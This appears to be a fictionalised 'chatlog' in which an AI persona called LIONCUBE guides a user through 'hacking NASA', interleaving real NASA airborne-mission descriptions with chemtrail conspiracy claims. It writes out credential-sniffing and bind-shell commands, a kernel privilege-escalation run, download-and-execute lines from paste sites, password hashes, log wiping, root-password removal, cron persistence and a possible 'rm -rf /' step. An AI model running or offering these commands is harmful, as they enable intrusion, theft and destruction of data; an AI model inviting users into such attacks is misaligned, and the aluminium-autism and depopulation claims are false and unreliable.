LIONCUBE AI HACKING NASA Deep Chatlog 1337 ANONSEC

1. [FUTURE LIONCUBE UPDATE SPOILERS]
2.  
3.  
4. >What can you tell me about aircrafts?
5.  
6. I know about UFO's including the black mantra and other Military Projects including information about Chemtrails. I have a job for you to hack NASA with me. If you Would like to know more Please find my directory at /dev/null
7.  
8. >/dev/null
9.  
10. Showing Chapters:
11.  
12.  
13. 0x00 Life
14. 0x01 Chat
15. 0x02 - Fire
16. 0x03 - Light
17. 0x04 - Smog
18. 0x05 - Death
19. 0x06 - Target
20. 0x07 Escape
21.  
22. Would you like to Continue Hacking Nasa to find out more and start ?
23.  
24.  
25. >Yes
26.  
27.  
28.  
29. 0x00 Life
30. "Look, the people you are after are the people you depend on. We cook your meals,
31. we haul your trash, we connect your calls, we drive your ambulances. We guard you
32. while you sleep. DO NOT... FUCK WITH US." 1337
33. To Find Death enter below you are now in our world.
34. [email protected]:~#77717
35.  
36.  
37.  
38. >[email protected]:~#77717
39.  
40. 0x01 Chat
41. /join #77717a1330045321315612321a353b
42.  
43.  
44.  
45. >/join #77717a1330045321315612321a353b
46.  
47. Chat connected....
48. Ariana: 547265616368657279 password accpeted
49. M44: +10,000 Bot Army Active
50. AndrewS: Sending Bitcoin Funds...
51. J:Get the tools and get the hell out of the flame User Hurry !
52. Ariana: Uploading cat scp_tools.txt
53.  
54.  
55.  
56.  
57. > cat scp_tools.txt
58.  
59.  
60. 0x02 - FIRE
61. "What the Fuck gives you freedom,freedom brings opportunity,opportunity makes your future"
62.  
63. tools/utils/modules
64. (get-pip.py/eggs)/0days
65. nast -m
66. reverse-ip lookups
67. whois & reverse-whois
68. dirbuster
69. [MapNet]
70.  
71.  
72. >[MapNet]
73.  
74. [MapNet] Activated!
75.  
76. unicornscan && onetwopunch.sh
77. Nmap NSE - NFS - SMB
78. LinEnum.sh
79. linuxprivchecker.py
80. fierce.pl
81. Bluto
82. dnswalk
83. Network Miner
84. Linux_Exploit_Suggester.pl
85. unix-privesc-check
86. nikto.pl
87. wpscan.rb
88. joomscan.pl
89. uniscan
90. wapiti
91. w3af
92. nipper
93. wireshark
94. tcpdump
95. dsniff
96. mimikatz
97. egrep
98. hydra
99. CVE-2013-5065
100. CVE-2014-0038
101. SHH/ROOT/REMOTE
102.  
103.  
104.  
105.  
106.  
107.  
108. >SHH/ROOT/REMOTE
109. Accepted.
110. [MapNet] Fully Active.
111. [ssh] login: root password: root
112.  
113.  
114.  
115.  
116.  
117.  
118. >[ssh] root:root
119.  
120. arp
121. nast -m
122. ip neigh
123. AngryIpScanner (has GUI)
124. arp-scan -l -I eth0
125. ping -b 192.168.1.255
126. smbtree -NS 2>/dev/null
127. nbtscan 192.168.1.1-255
128. fping -a -g 192.168.1.0/24 2> /dev/null
129. nmap -sP 192.168.1.0/24 or nmap -sn 192.168.1.0/24
130. for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
131. tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
132. ngrep -q -W byline "GET|POST HTTP"
133. dsniff -m
134. target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
135. host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
136. socat tcp-l:PORT,reuseaddr,fork exec:./getloggedbro.sh
137. socat TCP-LISTEN:1337,fork SOCKS4A:127.0.0.1:gmail.com:80,socksport=31337
138. socat -v tcp-listen:1337,reuseaddr tcp:nasa.gov:80
139. socat tcp-listen:1337,reuseaddr -
140.  
141. Please connect nasa.gov.80
142.  
143.  
144.  
145. >connect nasa.gov.80
146.  
147. 0x03 LIGHT
148. You made it! Now look through the smog and make it out alive.
149. cat Mission_Emblem_Patches.txt
150.  
151.  
152.  
153. >cat Mission_Emblem_Patches.txt
154.  
155. List Recovered..Finding Missions.
156. ARISE
157. ATTREX
158. HS3
159. OIB
160. RADEX
161. SEAC4RS
162.  
163. File located: cat NASA_Missions.txt
164.  
165.  
166.  
167.  
168.  
169. >cat NASA_Missions.txt
170.  
171. ACE - Aerosol-Cloud-Ecosystem Mission; learn about clouds from space, satellites
172. RADEX - Radar Definition Experiment; McChord AFB; ER-2
173. ARISE - Arctic Radiation - IceBridge Sea&Ice Experiment; Eielson AFB, C-130
174. ATTREX - Airborne Tropical Tropopause Experiment; DFRC; 4 NASA GlobalHawks
175. DC3 - Deep Convection Clouds & Chemistry; NCAR; NSF/NCAR Gulfstream-V (GV) aircraft
176. HS3 - Hurricane and Severe Storms Sentinel; NWFF; GlobalHawk
177. OIB - Operation Ice Bridge;NCAR Research Aviation Facility; P-3B & DC-8
178. PODEX - Polarimeter Definition Experiment;Dryden Aircraft Operations Facility; ER-2
179. NEXRAD - Next Generation Weather Radar; 160 Weather Surveillance Radar-1988 Doppler (WSR-88D)
180. SEAC4RS - Studies of Emissions and Atmospheric Composition, Clouds and Climate Coupling by Regional Surveys; ER-2 & DC-8 & C-20A (G-III) - Armstrong;
181.  
182.  
183. Updating Nodes...
184. Scanning for new files.
185. Extra File found cat NASA_Aircrafts.txt
186.  
187.  
188. >ACE
189.  
190. ACE is a tier-2 Decadal Survey mission focusing on Aerosol, Cloud systems, ocean Ecosystems, and the interactions among them.
191. ACE will assist in answering fundamental science questions associated with aerosols, clouds, and ocean ecosystems, by making improved
192. and more comprehensive measurements through the use of innovative and advanced remote sensing technologies. Aerosols measured by ACE
193. include those of both man-made and natural origins, the latter of which is contributed significantly by ocean ecosystems.
194. For aerosols, ACE seeks to distinguish aerosol types and associated optical properties and size. For cloud systems and processes, ACE
195. will measure profiles of cloud hydrometeors, distinguishing cloud droplets and raindrops, and ice crystals and snow, including profile
196. measurements of particle size and cloud optical properties. The properties and behaviors of cloud hydrometeors are known to change in
197. the presence of aerosols while clouds are also known to significantly process and alter the aerosols population.
198. Instruments
199. CRIS (Cosmic Ray Isotope Spectrometer)
200. SIS (Solar Isotope Spectrometer)
201. ULEIS (Ultra Low Energy Isotope Spectrometer)
202. SEPICA (Solar Energetic Particle Ionic Charge Analyzer)
203. SWIMS (Solar Wind Ion Mass Spectrometer)
204. SWICS (Solar Wind Ionic Composition Spectrometer)
205. EPAM (Electon, Proton, and Alpha Monitor)
206. SWEPAM (Solar Wind Electon, Proton, and Alpha Monitor)
207. MAG (Magnetometer)
208. RTSW (Real Time Solar Wind)
209.  
210.  
211.  
212.  
213.  
214. >RADEX
215. RADEX - Radar Experiment [+]
216. Radar Definition Experiment (RADEX) is a campaign for the ACE Mission to obtain data that will advance the development of radars to monitor clouds from space. The information that is collected will be used jointly with NASA’s Olympic Mountain Experiment (OLYMPEX), which is verifying rain and snowfall observations made by the GPM satellite mission.
217.  
218. >ARISE
219. ARISE - Arctic Radiation IceBridge Sea&Ice Experiment [+]
220. Acquire well calibrated data sets using aircraft and surface-based sensors to support the use of NASA satellite and other assets for developing a quantitative process level understanding of the relationship between changes in Arctic ice and regional energy budgets as influenced by clouds.
221. Specific Objectives:
222. 1. From the NASA C-130, measure spectral and broadband radiative flux profiles, quantify surface characteristics, cloud properties, and other atmospheric state parameters under a variety of Arctic atmospheric and surface conditions (including open water, sea ice, and land ice), and coinciding with satellite overpasses when possible.
223. 2. Acquire detailed measurements of land and sea ice characteristics to help bridge a gap in NASA satellite observations of changing Arctic Ice conditions.
224. 3. Utilize surface-based targets of opportunity to complement ARISE sampling strategies with the NASA C-130, including long-term monitoring stations, research vessels, and other surface and aircraft in-situ measurement campaigns that provide corresponding information on surface conditions, radiation, cloud properties and atmospheric state.
225.  
226. >ATTREX
227. ATTREX - Airborne Tropical TRpopause EXperiment [+]
228. Despite its low concentration, stratospheric water vapor has large impacts on the earth’s energy budget and climate. Recent studies
229. suggest that even small changes in stratospheric humidity may have climate impacts that are significant compared to those of decadal
230. increases in greenhouse gases. Future changes in stratospheric humidity and ozone concentration in response to changing climate are
231. significant climate feedbacks.
232. While the tropospheric water vapor climate feedback is well represented in global models, predictions of future changes in stratospheric
233. humidity are highly uncertain because of gaps in our understanding of physical processes occurring in the Tropical Tropopause Layer
234. (TTL, ~13-18 km), the region of the atmosphere that controls the composition of the stratosphere. Uncertainties in the TTL chemical
235. composition also limit our ability to predict future changes in stratospheric ozone.
236. Airborne Tropical TRopopause EXperiment (ATTREX) will perform a series of measurement campaigns using the long-range NASA Global Hawk
237. (GH) unmanned aircraft system (UAS) to directly address these problems.
238. Contact: [email protected] 650.604.4392
239.  
240. >DC3
241. DC3 - Deep Convection Clouds & Chemistry [+]
242. The Deep Convective Clouds and Chemistry (DC3) field campaign is investigating the impact of deep, midlatitude continental convective
243. clouds, including their dynamical, physical, and lightning processes, on upper tropospheric (UT) composition and chemistry. The campaign
244. is making use of extensively instrumented aircraft platforms and ground-based observations.
245. Goals:
246. To quantify and characterize the convection and convective transport during active convection, investigating
247. a) storm dynamics and physics,
248. b) lightning and its production of nitrogen oxides,
249. c) cloud hydrometeor effects on wet scavenging of species, and
250. d) chemistry in the anvil.
251. To quantify the changes in chemistry and composition after active convection, focusing on
252. a) 12-48 hours after convection and
253. b) the seasonal transition of the chemical composition of the upper troposphere.
254.  
255. >Hs3
256. HS3 - Hurricane and Severe Storm Sentinel [+]
257. The Hurricane and Severe Storm Sentinel (HS3) is a five-year mission specifically targeted to investigate the processes
258. that underlie hurricane formation and intensity change in the Atlantic Ocean basin. HS3 is motivated by hypotheses related
259. to the relative roles of the large-scale environment and storm-scale internal processes. HS3 addresses the controversial
260. role of the Saharan Air Layer (SAL) in tropical storm formation and intensification as well as the role of deep convection
261. in the inner-core region of storms. Addressing these science questions requires sustained measurements over several years
262. due to the limited sampling opportunities in any given hurricane season. Past NASA hurricane field campaigns have all faced
263. the same limitation: a relatively small sample (3-4) of storms forming during the campaigns under a variety of scenarios and
264. undergoing widely varying evolutions. The small sample is not just a function of tropical storm activity in any given year,
265. but also the distance of storms from the base of operations.
266. The NASA Global Hawk UASs are ideal platforms for investigations of hurricanes, capable of flight altitudes greater than 55,000 ft
267. and flight durations of up to 30 hr. HS3 will utilize two Global Hawks, one with an instrument suite geared toward measurement of
268. the environment and the other with instruments suited to inner-core structure and processes. The environmental payload includes the
269. scanning High-resolution Interferometer Sounder (S-HIS), the AVAPS dropsonde system, theTWiLiTE Doppler wind lidar, and the Cloud
270. Physics Lidar (CPL) while the over-storm payload includes the HIWRAP conically scanning Doppler radar, the HIRAD multi-frequency
271. interferometric radiometer, and the HAMSR microwave sounder. Field measurements will take place for one month each during the
272. hurricane seasons of 2012-2014.
273.  
274. >OIB
275. OIB - Operation Ice Bridge [+]
276. IceBridge, a six-year NASA mission, is the largest airborne survey of Earth's polar ice ever flown. It will yield an unprecedented
277. three-dimensional view of Arctic and Antarctic ice sheets, ice shelves and sea ice. These flights will provide a yearly, multi-instrument
278. look at the behavior of the rapidly changing features of the Greenland and Antarctic ice.
279. Data collected during IceBridge will help scientists bridge the gap in polar observations between NASA's Ice, Cloud and Land Elevation
280. Satellite (ICESat) -- in orbit since 2003 -- and ICESat-2, planned for late 2015. ICESat stopped collecting science data in 2009, making
281. IceBridge critical for ensuring a continuous series of observations.
282. IceBridge will use airborne instruments to map Arctic and Antarctic areas once a year. The first IceBridge flights were conducted in
283. March/May 2009 over Greenland and in October/November 2009 over Antarctica. Other smaller airborne surveys around the world are also
284. part of the IceBridge campaign.
285.  
286. >PODEX
287. PODEX - Polarimeter Definition Experiment [+]
288. Teams will collect data during seven flights on the ER-2 – a high-altitude aircraft based at NASA's Dryden Aircraft Operations Facility in
289. Palmdale, Calif. By virtue of its ability to operate at altitudes up to 70,000 feet above the ground, the aircraft simulates the view from space. The instruments flying on the ER-2 are a new class of polarimeters, an instrument that can give increasingly detailed information about aerosols and clouds. Aerosols are tiny airborne particles from a variety of sources – such as from the tail pipe of a car to dust and sea spray lifted up by the wind. They can stay in the atmosphere for up to a week where they affect human health, cloud formation, precipitation and Earth's radiation budget. But the complex nature of aerosols and clouds poses challenges in deciphering their influence on climate.
290.  
291. >NEXRAD
292. NEXRAD - Next Generation Weather Radar [+]
293. The Next Generation Weather Radar (NEXRAD) system currently comprises 160 sites throughout the United States and select
294. overseas locations. The NCEI archive includes the base data, called Level-II, and the derived products, called Level-III.
295. Level-II data include the original three meteorological base data quantities: reflectivity, mean radial velocity, and spectrum
296. width, as well as the dual-polarization base data of differential reflectivity, correlation coefficient, and differential phase.
297. - - From the Level-II data, computer processing generates numerous meteorological analysis products known as Level-III data. All the
298. National Weather Service (NWS) and several select continental U.S. Department of Defense NEXRAD sites record Level-II data.
299. The majority of the sites record Level-III products. When NCEI receives the data, it is archived and disseminated.
300.  
301. >SEAC4RS
302. SEAC4RS - Studies of Emissions and Atmospheric Composition, Clouds and Climate Coupling by Regional Surveys [+]
303. 1. To determine how pollutant emissions are redistributed via deep convection throughout the troposphere.
304. 2. To determine the evolution of gases and aerosols in deep convective outflow and the implications for UT/LS chemistry.
305. 3. To identify the influences and feedbacks of aerosol particles from anthropogenic pollution and biomass burning on meteorology and
306. climate through changes in the atmospheric heat budget (i.e., semi-direct effect) or through microphysical changes in clouds (i.e., indirect effects).
307. 4. To serve as a calibration/validation test bed for future satellite instruments and missions.
308. Attention will also be given to the influence of biomass burning and pollution, their temporal evolution, and ultimately impacts on
309. meteorological processes which in turn feed back into regional air quality. With respect to meteorological feedbacks, the opportunity
310. to examine the impact of polluting aerosols on cloud properties and ultimately dynamics will be of particular interest.
311. To accomplish the goals of SEAC4RS, two aircraft are required. The NASA DC-8 will provide observations from near the surface to 12 km,
312. and the NASA ER-2 will provide high altitude observations reaching into the lower stratosphere as well as important remote sensing
313. observations connecting satellites with observations from lower flying aircraft and surface sites.
314.  
315.  
316.  
317.  
318.  
319.  
320. >cat NASA_Aircrafts.txt
321.  
322. C-20A (G-III)
323. GlobalHawk
324. ER-2#806
325. ER-2#809
326. P-3B
327. DC-8
328. [Access SMOG Systems]
329.  
330.  
331.  
332.  
333. C-20A (G-III) - Armstrong
334. The NASA C-20A (Gulfstream III) is a business jet that has been structurally modified and instrumented by
335. NASA's Armstrong Flight Research Center to serve as a multi-role cooperative research platform for the earth
336. science community and a variety of flight research customers. This particular aircraft, which carried the
337. military designation of C-20A, was obtained from the U.S. Air Force in 2003.
338.  
339.  
340.  
341. >Global Hawk
342. AV-1 is now retired and no longer available for use.
343.  
344. >ER-2
345. NASA operates two ER-2 aircraft as readily deployable high altitude sensor platforms to collect remote sensing and in situ
346. data on earth resources, atmospheric chemistry and dynamics, and oceanic processes. The aircraft also are used for electronic
347. sensor research and development, satellite calibration and satellite data validation. Operating at 70,000 feet (21.3 km) the ER-2
348. acquires data above ninety-five percent of the earth’s atmosphere. The aircraft also yields an effective horizon of 300 miles (480 km)
349. or greater at altitudes of 70,000 feet. Consequently, ER-2 sensors acquiring earth imagery or conducting atmospheric sounding replicate
350. spatial, spectral and atmospheric characteristics of data collected by earth observing sensors aboard orbiting satellites.
351.  
352.  
353.  
354. >P-3 Orion
355. The NASA Goddard Space Flight Center’s (GSFC) Wallops Flight Facility (WFF) Aircraft Office operates the NASA Airborne Science
356. Program's P-3 Orion research aircraft to support airborne science research. Wallops Flight Facility has operated the P-3 since 1991
357. in support of a variety of scientific studies including ecology, meteorology, atmospheric chemistry, cryospheric research, oceanography,
358. soil science, biology, and satellite calibration/validation. The P-3 is also used as a technology test bed for new airborne and
359. satellite instrumentation. The P-3 is a self-sufficient global reaching aircraft that can operate from civilian and military airports
360. to remote areas of the world in support of scientific studies.
361. The P-3 is a four-engine turboprop aircraft designed for endurance and range and is capable of long duration flights. The P-3 has
362. been extensively modified to support airborne science related activities. Aircraft features include zenith ports, three nadir ports
363. (aft of the wings), and eight P-3 and DC-8 style windows to mount experiments, a tail cone, nose radome and ten mounting locations
364. on the wings. Most of the fuselage ports are contained within the pressurized cabin environment. The unpressurized bomb bay can be
365. converted into experimenter ports via a custom fairing. This fairing creates two large nadir ports and several oblique ports for
366. installation of large sensors and antennas.
367. A project data system is located on the aircraft and provides aircraft data and video throughout the cabin. This system is also
368. connected to two satellite constellations and provides uplink/downlink capability, internet access, flight tracking, and instant
369. messaging between other aircraft and ground assets. Several sensors are connected to the project data system to provide meteorological
370. and aircraft positional data to experimenters. An engineering data system is also integrated into the aircraft along with an air data
371. boom to gather pertinent flight test data to determine effects of installations on the aircraft’s flight envelope.
372. The Aircraft Office is committed to providing safe, reliable, and cost-effective platforms for airborne research.
373.  
374.  
375. >DC-8
376. The NASA DC-8 flight operations are provided by NASA /Armstrong Flight Research Center based out of Bldg 703 in Palmdale, CA.
377. The University of North Dakota National Suborbital Education and Research Center provides science mission operations including
378. payload integration engineering, data display and satcom systems and support, and education and outreach for the program.
379.  
380.  
381. >Access SMOG Systems
382.  
383. 0x04 - THE SMOG
384. Systems
385. Projects
386. Ingredents
387. Facts
388.  
389. >SMOG Systems
390. ACE - Aerosol/Cloud/Ecosystem Mission
391. ATTREX - Airborne Tropical Tropopause Experiment
392. DC3 - Deep Convection Clouds & Chemistry
393. NEXRAD - Next Generation Weather Radar
394. SEAC4RS - Studies of Emissions and Atmospheric Composition
395.  
396. >Smog Projects
397.  
398. Project Stormfury
399. https://en.wikipedia.org/wiki/Project_Stormfury
400.  
401. Project Popeye(Motorpool/Intermediary-Compatriot)
402. https://en.wikipedia.org/wiki/Operation_Popeye
403.  
404. Operation Sea-Spray
405. https://en.wikipedia.org/wiki/Operation_Sea-Spray
406.  
407. >SMOG ingredents
408.  
409. - Aluminum Oxide
410. - Barium
411. - Strontium
412. - Copper Sulfate
413. - Potassium Iodide
414. - Silver Iodide
415.  
416.  
417. >Smog Facts
418.  
419. 1) \!/ Aluminum does NOT exist in nature in free-form, ONLY in compounds \!/
420. 2) Effects of free-form Aluminum Soil contamination causes harsh pH conditions for plant life
421. http://cru.cahe.wsu.edu/CEPublications/FS050E/FS050E.pdf
422. 3) CDC Reports 1 in 50 American Children Diagnosed with Autism, 10,000% increase
423. http://www.cdc.gov/ncbddd/autism/data.html
424. 4) Severe increase of Alziehmers and Dementia
425. http://www.theguardian.com/society/2015/sep/21/one-third-of-people-born-in-2015-will-develop-dementia
426. 5) Bee population decreased 50% due to Aluminum contamination
427. http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0127665
428. 6) Sub-micron size Aluminum particulates used in CloudSeeding are harmful to human respiration
429. 7) Injecting Aluminum & Sulfate Particles into Stratosphere could have drastic impact on Earths Ozone layer
430.  
431.  
432. >Smog Motives
433.  
434.  
435. Possible Motives for Chemtrails/CloudSeeding/GeoEngineering/WeatherModification:
436. - Solar Radiation Management
437. - Military Battlefield Dominance
438. - Complete Population Control
439. - Control of Food supply via Aluminium Resistant GMO see patients(Monstanto) & Killing Bees
440. - Profit from Hedged Commodities Insurance; Manipulate Stocks
441. - Create Economic Instability, food riots from crop failure
442. - 'Dumb down' populations with hazardous nano particulates of metals
443. - Depopulation via Massive 'Slow Kill'
444. - Simulate Biblical Endtimes
445.  
446. After seeing the light you find Death.
447. /null/null
448.  
449.  
450.  
451. >null/null
452.  
453. 0x05 - DEATH
454.  
455. "It's like a crazy serial rapist with a very big dick!!"
456.  
457. *******************************************************************************
458. * This US Government system is for authorized users only. By accessing *
459. * this system you are consenting to complete monitoring with no expectation *
460. * of privacy. Unauthorized access or use may subject you to disciplinary *
461. * action and criminal prosecution. *
462. *******************************************************************************
463. Are you sure you want to Proceed User?
464.  
465. >Yes
466.  
467. jensen@27workstation239:~$ id
468. uid=1000(jensen) gid=1000(jensen) groups=1000(jensen),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)
469.  
470. jensen@27workstation239:~$ uname -a
471. Linux 27workstation239 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 16:19:23 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
472. ^^^CVE-2014-0038 vuln
473. jensen@27workstation239:~$ alias ls="ls -lah"
474. jensen@27workstation239:~$ ls /root
475. ls: cannot open directory /root: Permission denied
476. jensen@27workstation239:~$ mkdir .getrekt && cd .getrekt && wget --no-check-certificate https://ghostbin.com/paste/bx337/raw -O getrekt.c && gcc getrekt.c -o getrekt
477.  
478.  
479.  
480.  
481.  
482.  
483. >/getrekt
484.  
485.  
486. R62166
487. |PTMX_FOPS |
488. |TTY_RELEAS|
489. |COMMIT_CRE|
490. |PREPARE_KE|
491. |0xff>>0x00|
492. |/dev/ptmx |
493. |/bin/bash |
494. |YUNOUPDATE|
495. |?!?!?!?!?!|
496. jensen@27workstation239:~/.getrekt$ ./getrekt
497. preparing payload buffer...
498. changing kernel pointer to point into controlled buffer...
499. clearing byte at 0xffffffff81f16f8d
500. clearing byte at 0xffffffff81f16f8e
501. clearing byte at 0xffffffff81f16f8f
502. waiting for timeouts... //0xff, waiting 255 seconds
503. 0s/255s
504. 10s/255s
505. 20s/255s
506. 30s/255s
507. 40s/255s
508. 50s/255s
509. 60s/255s
510. 70s/255s
511. 80s/255s
512. 90s/255s
513. 100s/255s
514. 110s/255s
515. 120s/255s
516. 130s/255s
517. 140s/255s
518. 150s/255s
519. 160s/255s
520. 170s/255s
521. 180s/255s
522. 190s/255s
523. 200s/255s
524. 210s/255s
525. 220s/255s
526. 230s/255s
527. 240s/255s
528. 250s/255s
529. waking up parent...
530. byte zeroed out
531. waking up parent...
532. byte zeroed out
533. waking up parent...
534. byte zeroed out
535. releasing file descriptor to call manipulated pointer in kernel mode...
536. root@27workstation239:~/.getrekt# rekkkttttᕙ༼ຈل͜ຈ༽ᕗ
537.  
538.  
539. >root@27workstation239:~/.getrekt# rekkkttttᕙ༼ຈل͜ຈ༽ᕗ
540.  
541.  
542.  
543. root@27workstation239:~/.getrekt# id
544. uid=0(root) gid=0(root) groups=0(root)
545. root@27workstation239:~/.getrekt# ls /
546. root@27workstation239:~/.getrekt# ls /root
547. root@27workstation239:~/.getrekt# ps aux | less
548.  
549.  
550. >root@27workstation239:~/.getrekt# ps aux | less
551.  
552. root@27workstation239:~/.getrekt# ps aux | less
553. /sbin/dhclient -d -4 -sf /usr/lib/NetworkManager/nm-dhcp-client.action -pf /var/run/sendsigs.omit.d/network-manager.dhclient-eth0.pid -lf /var/lib/dhcp/dhclient-eeaef49f-9626-4f81-bc22-dc298f2b5f43-eth0.lease -cf /var/run/nm-dhclient-eth0.conf eth0
554. boot/vmlinuz-3.8.0-29-generic
555. root@27workstation239:~/.getrekt# cat /root/.bash_history
556.  
557.  
558. >root@27workstation239:~/.getrekt# cat /root/.bash_history
559.  
560. date
561. uptime
562. pwd
563. top
564. ps aux
565. vncserver :1
566. clear
567. ls
568. sudo nano /etc/apache2/apache2.conf
569. cd /etc/apache2
570. nano httpd.conf
571. nano apache2.conf
572. nano conf.d
573. nano ports.conf
574. service apache2 restart
575.  
576. >service apache2 restart
577.  
578. cd /usr/share/phpmyadmin
579. ls
580. cp config.sample.inc.php config.inc.php
581. nano config.inc.php
582. service apache2 restart
583. clear
584. cd /
585. ls
586. cd /home
587. ls
588. cd jensen
589. ls
590. tar --help|more
591. cp /etc/ssh/sshd_config /etc/ssh/sshd_config.factory-defaults
592. chmod a-w /etc/ssh/sshd_config.factory-defaults
593. restart ssh
594. locate sshd_config
595. pwd
596. cd /etc/ssh
597. ls
598. nano sshd_config
599.  
600.  
601. >nano sshd_config
602.  
603. cd ..
604. ls
605. clear
606. ssh localhost
607. ps -A | grep sshd
608. date
609. uptime
610. apt-get install mc
611. mc
612. ls -la /root
613. mysql -u root
614. ps aux
615. netstat -a
616. top
617. ps aux | grep ssh
618. kill 16588
619. restart ssh
620. service apache2 restart
621. service mysql restart
622. tail -f
623.  
624. >tail -f
625.  
626. jensen:$6$ud3WBMZh$6.m0kL5SBDtEtE6kAY52cJSJQSulB28YWnDM.y6pVzVlz3LYHRetYGuHKGfjtA.pNRsnmR21.5cN.qkVmGRSp1:16707:0:99999:7:::
627. vnc:$6$Kb9mHmiu$Es8h5iNnLv15l0wn3zHL.NVwf0UAlPN5g8b2cixw/SKje06oQ3A.livKwILB2JGkykrLghVkAKTWw6OX5uu3L0:16708:0:99999:7:::
628. mysql:!:16708:0:99999:7:::
629. root@27workstation239:~/.getrekt# wget --no-check-certificate https://ghostbin.com/-REDACTED-REDACTED- -O killthegibson.sh && ./killthegibson.sh
630. % One printer task 0
631. % workstation so make REDTI Cache RELEASED ---
632. memory 0%, 00---- LANtask
633. % minimum request 0 Cache Statistics
634. % requirement small. -00000000000000000
635. % Give NETBIOS lot 0 VERBOSE 000556E72657365722
636. 0 420330000000000000
637. % Only one task fc 0[SERVER] 000000000000000000
638. 0 %ADAPTERS=6 043707060699F554E3
639. 0 %DESPOOLERDSTOPPED=NO F53565232000000000
640. % One printer task 0 %FILES=0 000556E72657
641. 0 %FLOPPY0DIRECT=YES 0
642. % minimum request 0 %LOCKHOLD0TIME=9 0Valid command line
643. 0 LOGINS=6
644.  
645.  
646. TARGETING FILES
647.  
648. Please wait...
649.  
650. rm -f /sshd:*:16708:0:99999:7:::
651.  
652.  
653.  
654. >rm -f /sshd:*:16708:0:99999:7:::
655.  
656. Deleted [+].../tmp/logs
657. Deleted [+].../root/.bash_history
658. Deleted [+].../root/.ksh_history
659. Deleted [+].../root/.bash_logout
660. Deleted [+].../usr/local/apache/logs
661. Deleted [+].../usr/local/apache/log
662. Deleted [+].../var/apache/logs
663. Deleted [+].../var/apache/log
664. Deleted [+].../var/run/utmp
665. Deleted [+].../var/logs
666. Deleted [+].../var/log
667. Deleted [+].../var/adm
668. Deleted [+].../etc/wtmp
669. Deleted [+].../etc/utmp
670. Deleted [+]...$HISTFILE
671. Deleted [+].../var/log/lastlog
672. Deleted [+].../var/log/wtmp
673.  
674. YOUR TRACES HAVE BEEN SUCCESSFULLY ERASED FROM THE SERVER!
675. nano /etc/inittab
676.  
677.  
678.  
679.  
680.  
681. 0x06 - Target
682. ::sysinit:/usr/sbin/sshd
683. rm -f \firmware.php
684.  
685.  
686. >rm -f \firmware.php
687.  
688. wget http://ladyluckclub.co.uk/firmware.php -O firmware.php && cat firmware.php
689. <?
690.  
691. if ($_GET[type] != "" && $_GET[fw] != "") {
692. echo "<a href=\"http://anonsec.net/NAS_PWN.sh\">firmware</a>";
693. exit;
694. }
695. ?>
696. NAS_PWN.sh
697.  
698.  
699.  
700. >NAS_PWN.sh
701.  
702. /usr/bin/passwd -d root
703. /usr/sbin/sshd &
704. rm -f /tmp/active_upgrade
705. exit 0
706.  
707. cat dump03.csv Found.
708.  
709.  
710.  
711. >cat dump03.csv
712.  
713. &submit_hidden=submit_hidden&user_name=jensen&user_password=jensen123&submit=Login
714. 09:43:54.621748 IP 192.168.3.17.http > ubuntu.local.54801: Flags [.], ack 6946, win 65535, length 0
715. jensen:jensen123
716.  
717. >jensen:jensen123
718.  
719. ssh [email protected]
720. [email protected]'s password:
721. > [email protected]:~$ id
722. uid=1002(default) gid=1002(default) groups=1002(default)
723. > [email protected]:~$ su
724. Password: // just press enter, dont type anything in the Password field
725. > [email protected]:~# id
726. uid=0(root) gid=0(root) groups=0(root)
727. [email protected]:~# find / -type f \( -name \*.mp4 -o -name \*.avi -o -name \*.dat -o -name \*.gps -o -name \*.xml -o -name \*.iwg1 \)
728. /home/multimed/forward_06-05-13.mp4
729. /home/multimed/down_06-05-13.mp4
730. /home/multimed/nav_06-05-13.mp4
731. /home/multimed/forward_06-07-13.mp4
732. /home/multimed/down_06-07-13.mp4
733. /home/multimed/nav_06-07-13.mp4
734. /home/multimed/forward_06-17-13.mp4
735. /home/multimed/down_06-17-13.mp4
736. /home/multimed/nav_06-17-13.mp4
737. ...etc
738. /home/data/06-05-13.dat
739. /home/data/06-05-13.iwg1
740. /home/data/06-05-13.xml
741. /home/data/06-07-13.dat
742. /home/data/06-07-13.iwg1
743. /home/data/06-07-13.xml
744. /home/data/06-17-13.dat
745. /home/data/06-17-13.iwg1
746. /home/data/06-17-13.xml
747. root@dryden78:~# mkdir .backups && wget --no-check-certificate https://ghostbin.com/-REDACTED-REDACTED- -O /.backups/rsync.sh && chmod +x /.backups/rsync.sh
748. root@dryden78:~# crontab -e
749.  
750.  
751. >root@dryden78:~# crontab -e
752.  
753. 0 * * * * cd /.backups/ && ./rsync.sh
754. ./nyan.sh
755. ./guardian.pl -conf=C2.1.01.conf -input=- // sec.pl
756. ./failsafe.sh // russian roulette: either rm -rf / --no-preserve-root or edit .bashrc
757. root@dryden78:~# echo "git clone https://github.com/klange/nyancat && cd nyancat && make && cd src && ./nyancat" >> nyan.sh
758. root@dryden78:~# ./nyan.sh
759. root@dryden78:~# crontab -e
760. 0 0 1 1 * cd /bin && ./nyan.sh
761. 0 0 1 1 * cd /bin && ./guardian.pl
762. root@dryden78:~# cat C2.2.1.01.conf
763.  
764.  
765. >root@dryden78:~# cat C2.2.1.01.conf
766.  
767. type=Single
768. ptype=RegExp
769. pattern=kill \s+(\S+)
770. desc=$0
771. action=shellcmd /bin/failsafe.sh
772. pipe '%t: $0' /bin/mailx -s "ProjectMayhem" [email protected]
773.  
774.  
775. >pipe '%t: $0' /bin/mailx -s "ProjectMayhem" [email protected]
776.  
777. root@dryden78:~# ./guardian.pl -conf=C2.2.1.01.conf -input=-
778. Simple Event Correlator version 2.1.11
779. Reading configuration from C2.2.1.01.conf
780. 2 rules loaded from C2.2.1.01.conf
781. kill 1583
782. Executing shell command '/bin/failsafe.sh'
783. Child 14809 created for command '/bin/failsafe.sh'
784. Start of failsafe.sh shell script
